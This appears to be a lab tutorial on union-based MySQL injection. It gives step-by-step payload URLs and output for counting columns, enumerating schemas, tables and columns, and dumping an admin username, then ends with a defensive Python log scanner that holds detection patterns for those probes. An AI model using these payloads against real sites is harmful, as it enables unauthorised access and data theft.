0x00 Overview

Used when the page has a visible output position (the query result is echoed back in the response).

0x01 Memory aid

  mysql> select * from test where id=-1 union select * from (
  (select 1)A join
  (select 2)B join
  (select 3)C join
  (select 4)D
  );
  +------+------+------+---------+
  | id   | test | map  | content |
  +------+------+------+---------+
  | 1    | 2    | 3    | 4       |
  +------+------+------+---------+
  1 row in set (0.00 sec)

0x02 Test table data

  # Test data table: test;
  mysql> select * from test;
  +------+------+------+---------+
  | id   | test | map  | content |
  +------+------+------+---------+
  | 1    | 1    | 1    | 1       |
  | 2    | 2    | 2    | 2       |
  | 3    | 3    | 3    | 3       |
  +------+------+------+---------+
  3 rows in set (0.00 sec)

  # Test admin table: tdb_admin;
  mysql> select * from tdb_admin;
  +----+----------+----------------------------------+
  | id | username | password                         |
  +----+----------+----------------------------------+
  | 1  | admin    | 7fef6171469e80d32c0559f88b377245 |
  +----+----------+----------------------------------+
  1 row in set (0.00 sec)

0x03 Checking the column count

Web request: http://www.test.com/sql.php?id=1 order by 4

Database statement: select * from test where id = 1 order by 4;

  # When the column count is correct
  mysql> select * from test where id = 1 order by 4;
  +------+------+------+---------+
  | id   | test | map  | content |
  +------+------+------+---------+
  | 1    | 1    | 1    | 1       |
  +------+------+------+---------+
  1 row in set (0.00 sec)

  # When the column count is exceeded
  mysql> select * from test where id = 1 order by 5;
  ERROR 1054 (42S22): Unknown column '5' in 'order clause'

The test table has 4 columns, so order by 4 works; one more and it errors. When it errors, reduce the number until it no longer errors.

0x04 Finding the display positions

Web request: http://www.test.com/sql.php?id=-1 union select * from ((select 1)A join (select 2)B join (select 3)C join (select 4)D)

Database statement: select * from test where id=-1 union select * from ((select 1)A join (select 2)B join (select 3)C join (select 4)D);

  mysql> select * from test where id=-1 union select * from (
  (select 1)A join
  (select 2)B join
  (select 3)C join
  (select 4)D
  );
  +------+------+------+---------+
  | id   | test | map  | content |
  +------+------+------+---------+
  | 1    | 2    | 3    | 4       |
  +------+------+------+---------+
  1 row in set (0.00 sec)

Note: my test table has exactly four columns, so joining 4 times is enough; in a real case with 5 columns, join 5 times.

0x05 Reading the database version / current user / current database

Web request: http://www.test.com/sql.php?id=-1 union select * from ((select version())A join (select user())B join (select database())C join (select 4)D)

Database statement: select * from test where id=-1 union select * from ((select version())A join (select user())B join (select database())C join (select 4)D);

  mysql> select * from test where id=-1 union select * from (
  (select version())A join
  (select user())B join
  (select database())C join
  (select 4)D
  );
  +--------+----------------+------+---------+
  | id     | test           | map  | content |
  +--------+----------------+------+---------+
  | 5.5.53 | root@localhost | test | 4       |
  +--------+----------------+------+---------+
  1 row in set (0.00 sec)

0x06 Enumerating database names

Note: changing the 0 in "limit 1 offset 0" shows the other database names.
For example:
offset 0 gives the 1st database
offset 1 gives the 2nd database

Web request: http://www.test.com/sql.php?id=-1 union select * from ((select schema_name from information_schema.schemata limit 1 offset 0)A join (select 2)B join (select 3)C join (select 4)D)

Database statement: select * from test where id=-1 union select * from ((select schema_name from information_schema.schemata limit 1 offset 0)A join (select 2)B join (select 3)C join (select 4)D);

  # 1st database
  mysql> select * from test where id=-1 union select * from (
  (select schema_name from information_schema.schemata limit 1 offset 0)A join
  (select 2)B join
  (select 3)C join (select 4)D
  );
  +--------------------+------+------+---------+
  | id                 | test | map  | content |
  +--------------------+------+------+---------+
  | information_schema | 2    | 3    | 4       |
  +--------------------+------+------+---------+
  1 row in set (0.00 sec)

  # 2nd database
  mysql> select * from test where id=-1 union select * from (
  (select schema_name from information_schema.schemata limit 1 offset 1)A join
  (select 2)B join
  (select 3)C join (select 4)D
  );
  +-------+------+------+---------+
  | id    | test | map  | content |
  +-------+------+------+---------+
  | 74cms | 2    | 3    | 4       |
  +-------+------+------+---------+
  1 row in set (0.00 sec)

0x07 Enumerating table names

Note: changing table_schema=xxx to another database dumps that database's tables.
For example:
table_schema=database() gets the tables of the currently connected database
table_schema='test' gets the tables of the test database

Web request: http://www.test.com/sql.php?id= -1 union select * from (
(select table_name from information_schema.tables where table_schema=DATABASE() limit 1 offset 0)A join
(select 2)B join
(select 3)C join
(select 4)D
);

Database statement: select * from test where id=-1 union select * from (
(select table_name from information_schema.tables where table_schema=DATABASE() limit 1 offset 0)A join
(select 2)B join
(select 3)C join
(select 4)D
);

  mysql> select * from test where id=-1 union select * from (
  (select table_name from information_schema.tables where table_schema=DATABASE() limit 1 offset 0)A join
  (select 2)B join
  (select 3)C join
  (select 4)D
  );
  +-----------+------+------+---------+
  | id        | test | map  | content |
  +-----------+------+------+---------+
  | tdb_admin | 2    | 3    | 4       |
  +-----------+------+------+---------+
  1 row in set (0.00 sec)

0x08 Enumerating column names

table_schema = "xx" is the database to enumerate
table_name = "xx" is the table to enumerate

offset 0 is the position of the column to enumerate
For example:
table tdb_admin has the columns id, username, password
offset 0 = id
offset 1 = username
offset 2 = password

Web request: http://www.test.com/sql.php?id= -1 union select * from (
(select column_name from information_schema.columns where table_schema=DATABASE() AND table_name='tdb_admin' limit 1 offset 0)A join
(select 2)B join
(select 3)C join
(select 4)D
)

Database statement: select * from test where id=-1 union select * from (
(select column_name from information_schema.columns where table_schema=DATABASE() AND table_name='tdb_admin' limit 1 offset 0)A join
(select 2)B join
(select 3)C join
(select 4)D
)

  # Column 1
  mysql> select * from test where id=-1 union select * from (
  (select column_name from information_schema.columns where table_schema=DATABASE() AND table_name='tdb_admin' limit 1 offset 0)A join
  (select 2)B join
  (select 3)C join
  (select 4)D
  );
  +------+------+------+---------+
  | id   | test | map  | content |
  +------+------+------+---------+
  | id   | 2    | 3    | 4       |
  +------+------+------+---------+
  1 row in set (0.00 sec)

  # Column 2
  mysql> select * from test where id=-1 union select * from (
  (select column_name from information_schema.columns where table_schema=DATABASE() AND table_name='tdb_admin' limit 1 offset 1)A join
  (select 2)B join
  (select 3)C join
  (select 4)D
  );
  +----------+------+------+---------+
  | id       | test | map  | content |
  +----------+------+------+---------+
  | username | 2    | 3    | 4       |
  +----------+------+------+---------+
  1 row in set (0.00 sec)

0x09 Dumping row contents

Note: offset 0 selects which row is displayed
offset 0 is the first row
offset 1 is the second row

Web request: http://www.test.com/sql.php?id= -1 union select * from (
(select (select username from test.tdb_admin limit 1 offset 0))A join
(select 2)B join
(select 3)C join
(select 4)D
)

Database statement: select * from test where id=-1 union select * from (
(select (select username from test.tdb_admin limit 1 offset 0))A join
(select 2)B join
(select 3)C join
(select 4)D
)

  mysql> select * from test where id=-1 union select * from (
  (select (select username from test.tdb_admin limit 1 offset 0))A join
  (select 2)B join
  (select 3)C join
  (select 4)D
  );
  +-------+------+------+---------+
  | id    | test | map  | content |
  +-------+------+------+---------+
  | admin | 2    | 3    | 4       |
  +-------+------+------+---------+
  1 row in set (0.00 sec)
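From the defender's side, the probes walked through above leave a recognizable trail in the web server log. The Python below is an added example, not part of the original write-up: it decodes the id parameter of constructed request lines modelled on the sql.php URLs above, flags the ORDER BY column-count probing, the comma-free "(select ...)X join" UNION padding and the information_schema reads, and treats anything other than a plain integer as suspect (the same strict check the endpoint itself should enforce).

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed request lines (not taken from the write-up), modelled on the probes
# it walks through against /sql.php?id=... ; the encoded form is what a web log holds.
SAMPLE_REQUESTS = [
    "GET /sql.php?id=1 HTTP/1.1",
    "GET /sql.php?id=1%20order%20by%204 HTTP/1.1",
    "GET /sql.php?id=1%20order%20by%205 HTTP/1.1",
    "GET /sql.php?id=-1%20union%20select%20*%20from%20((select%201)A%20join%20(select%202)B"
    "%20join%20(select%203)C%20join%20(select%204)D) HTTP/1.1",
    "GET /sql.php?id=-1%20union%20select%20*%20from%20((select%20schema_name%20from"
    "%20information_schema.schemata%20limit%201%20offset%200)A%20join%20(select%202)B) HTTP/1.1",
    "GET /sql.php?id=42 HTTP/1.1",
]

# One pattern per stage of the technique: ORDER BY column-count probing, the comma-free
# "(select ...)X join" padding inside a UNION, and reads from information_schema.
ORDER_BY_PROBE = re.compile(r"\border\s+by\s+\d+\b", re.I)
JOIN_UNION = re.compile(r"\bunion\s+(?:all\s+)?select\b.*?\(\s*select\b[^()]*\)\s*\w+\s+join\b", re.I | re.S)
INFO_SCHEMA = re.compile(r"\binformation_schema\s*\.\s*(?:schemata|tables|columns)\b", re.I)

def id_param(request_line):
    """Return the URL-decoded 'id' query parameter of a GET request line, or None."""
    path = request_line.split(" ")[1]
    params = dict(parse_qsl(urlsplit(path).query, keep_blank_values=True))
    return params.get("id")

def classify(request_line):
    """Label one request line. A plain integer id is 'clean'; that strict check is also
    the server-side validation that stops every probe below before it reaches MySQL."""
    value = id_param(request_line)
    if value is None:
        return ["no-id"]
    if re.fullmatch(r"-?\d+", value.strip()):
        return ["clean"]
    tags = [name for name, pattern in (("order-by-probe", ORDER_BY_PROBE),
                                       ("join-based-union", JOIN_UNION),
                                       ("information_schema-read", INFO_SCHEMA))
            if pattern.search(value)]
    return tags or ["non-integer-id"]

def scan(requests):
    """Map each suspicious request line to its labels, skipping clean traffic."""
    return {r: classify(r) for r in requests if classify(r) != ["clean"]}

if __name__ == "__main__":
    for line, tags in scan(SAMPLE_REQUESTS).items():
        print(tags, line)
```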